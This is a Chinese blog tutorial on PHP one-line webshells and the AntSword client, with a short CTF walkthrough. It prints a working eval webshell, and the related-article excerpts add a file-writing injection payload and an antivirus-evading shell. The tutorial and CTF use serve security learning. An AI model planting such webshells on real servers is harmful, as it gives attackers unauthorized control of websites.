蚁剑与一句话木马

最新推荐文章于 2024-11-01 12:47:32 发布
最新推荐文章于 2024-11-01 12:47:32 发布
阅读量6.4k 收藏 16
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55771794/article/details/118767852
版权
本文介绍了PHP环境下的一句话木马,例如<?php@eval($_POST['syc']);?>,其通过文件上传漏洞获取服务器权限。入侵条件包括木马上传、知道路径及能正常运行。蚁剑作为工具,用于控制网站目录。在安装蚁剑时可能遇到的问题及解决办法也进行了简单说明,并建议通过实际操作加深理解。
摘要由CSDN通过智能技术生成

目录

一句话木马

一个关于php的例子

入侵条件

蚁剑的下载与安装

在安装的时候注意

真题实践

一句话木马

先来说说一句话木马是什么东西

一句话木马,又简称(webshell),在很多渗透测试时,渗透人员会上传一句话木马到目前web服务目录继而提权获取系统权限。

举一个关于php的例子

 <?php @eval($_POST['syc']);?>

它的原理呢,是利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以通过中国菜刀即可获取和控制整个网站目录。

@表示后面即使执行错误,也不报错。

eval()函数表示括号内的语句字符串什么的全都当做代码执行。

$_POST['syc']表示从页面中获得syc这个参数值

入侵条件

        (1)木马上传成功

        (2)知道木马的路径

        (3)木马能够正常运行

如果想要更加详细深入的了解的话,可以看一看这篇文章
https://blog.csdn.net/weixin_39190897/article/details/86772765

蚁剑的下载与安装

蚁剑和菜刀就是使用一句话木马的

这一篇博客里有具体的内容,我就不重复造车了

https://www.fujieace.com/hacker/tools/antsword.html

在安装的时候注意

如果出现白屏的话,可以试试挂加速器

如果代码解析失败,得把两个文件放一起。

我捣鼓了一堆,估计得有几个蚁剑,没关系,能够运行就行!

来一道相关的题,更加深刻的理解一句话木马

真题实践

都说这么明显了,,,,,直接上吧

由于我菜刀老是用不起,,而且蚁剑的功能更好,那我们就用蚁剑

直接添加,然后输入网站url,密码即为Syc,然后就登录成功了,可以看见目录,往下翻到flag,找到了!

 这道题的一句话木马已经上传好了,具体的内容,之后遇见在详细解释吧!

 

Tang_y1
关注
一句话木马构造与连接_%&gt;&lt;%eval request(
m0_60721860的博客
04-09 1213
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
连接一句话木马
m0_64417923的博客
05-18 8555
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
的下载与一句话木马
tang3030的博客
09-15 2071
打开宝塔进入admin
AntSword的应用(一句话密码病毒)
最新发布
2301_80127468的博客
11-01 430
AntSword与一句话病毒
玄机--流量
m0_75046593的博客
09-23 583
第一特征的请求包加密,返回包以明文形式传输第二特征http头中存在init_set字段并且content-type是urlencoded。
一句话木马
qq_35856778的博客
09-16 1万+
一、一句话木马 <?php @eval($_POST[a]);?> $_POST[这里是连接密码] 二、利用poc在网站目录下插入文件 ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php @eval($_POST[a]); ?>')</php> 将这条代码放到域名后面 三、获取权限 ...
连接一句话木马演示
undefine
12-18 1万+
需要准备 一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。 我这里服务器用win2008R2系统 攻击机用win10 接下来我会演示 php 的一句话木马 其他脚本语言的一句话木马使用过程和这个差别不大 在服务器上安装phpstudy 快速搭建服务器 安装成功后启动apache 尝试打开网站,看看是否成功 出现下面的页面代表成功 现在服务端就配置成功了 现在在攻击端安装菜刀,等等类似工具,可以去看怎么
一句话木马、sql注入、的安装及使用
veinard_F的博客
05-20 4417
一、基本原理 sql注入主要目标是 Web 应用的后台数据库,从数据库中获取信息和授予较高的权限。它先破坏数据库,再对数据库服务器进行破坏。 sql的概述 浏览网站 发送一个请求SQL语言指令返回数据或执行结果通过web包装后的数据用户web服务端数据库系统 基本类型: 数字型和字符型的注入; 报错型SQL注入; 布尔/时间的SQL注入; 可联合查询的SQL注入; 判断注入类型: 1、数字型注入:id=1 and 1=2,若回显不正常则为数字型注入 2、字符型注入:上述测试若回显正常则为字符型注入 3、报错
jsp一句话木马
jennycisp的博客
12-25 3694
密码为 passwd。
安全技术系列之Java一句话木马
好记性不如烂笔头
10-14 4435
安全技术系列文章
一句话木马过狗 php,ASP/PHP一句话木马过安全狗等杀软
weixin_28933797的博客
03-09 1279
站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的一些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。整理一些常用的PHP、ASP、jsp常用到的一句话木马,部分过安全狗、D盾。看多了之后 自然可以干掉木马……PHP一句话木马1、$hh="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$h...
使用(一句话木马
Ye_XuanL的博客
10-31 222
在物理机上的"E:\phpstudy_pro\WWW\"文件夹创建“shell.php”并输入以下php代码。先打开创建的网站,然后输入网站,密码就是cmd。(推荐虚拟机实现,一般的杀毒软件都会试图阻止)创建成功后双击,成功。
中国安装教程——antsword及webshell一句话木马
qq_53099802的博客
04-22 7680
antsword与php一话木马
antSword-maste下载-安装-使用-一句话木马
JavaBigData的博客
08-10 910
https://github.com/AntSwordProject/antSword
tomcat put方法任意写文件漏洞
weixin_48739941的博客
04-21 2910
(1)cd vulhub/tomcat/CVE-2017-12615 切换目录。 (2) docker-compose up -d 启动。 (3)访问:http://192.168.43.137:8080/ (4)burpsuite抓包。 (5)send to repeater,修改为PUT /l3yx.txt。 (6) docker exec -it 3e7 bash ; cd webapps/ ;cd ROOT ;cat l3yx.txt进入容器,查看。 ...
文件上传漏洞—连接地址错误、一句话木马php语法错误
热门推荐
Xionghuimin的博客
06-02 3万+
题目 第一步:把写有<?php phpinfo(); ?>代码的txt文件改文件名为infor.jpg,上传过程中用burpsuite抓包修改为infor.php。提示上传成功后在url中可以打开 第二步:把写有 <? php phpinfo(); @eval($_POST['shell']); ?> 代码的txt文件改文件名为infors.jpg,上传过程中用burpsuite抓包修改为infors.php。提示上传成功后在url中打开但是什么也没有显示,也连接不上。
一句话木马免杀
liushaojiax的博客
01-09 548
链接:https://pan.baidu.com/s/1t3DVuSHitZ7gPcywXnXwVA?upload是php写的需要搭建php环境推荐phpstudy。可以看到已经拦截到上传的图片,现在可以更改文件后缀;可以看到已经上传成功了然后右键获取到图片地址。由于有上传限制我们将写的木马文件改为png。注意:由于电脑有安全管家,这样写是不行的。5、bp拦截文件,打开谷歌代理和bp拦截。2、安装谷歌代理,Burp、;1、搭建靶场upload。6、使用获取靶机。双击就可以获取到靶机。
一句话木马构造与连接_%&gt;&lt;%eval request(,2024年最新狂刷200道数据结构与算法
2401_84247760的博客
04-11 390
连接密码都设为1231.创建一个txt文档,把上述命令写入,保存为muma.php。 2.准备一张图片和muma.php放在同一个文件夹中,cmd进入该文件夹。 生成含有一句话木马的图片:copy 准备的图片.jgp/b + muma.php/a 生成新的图片.jpg生成含有一句话木马的php文件:copy 准备的图片.jgp/b + muma.php/a 生成新的图片.php自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值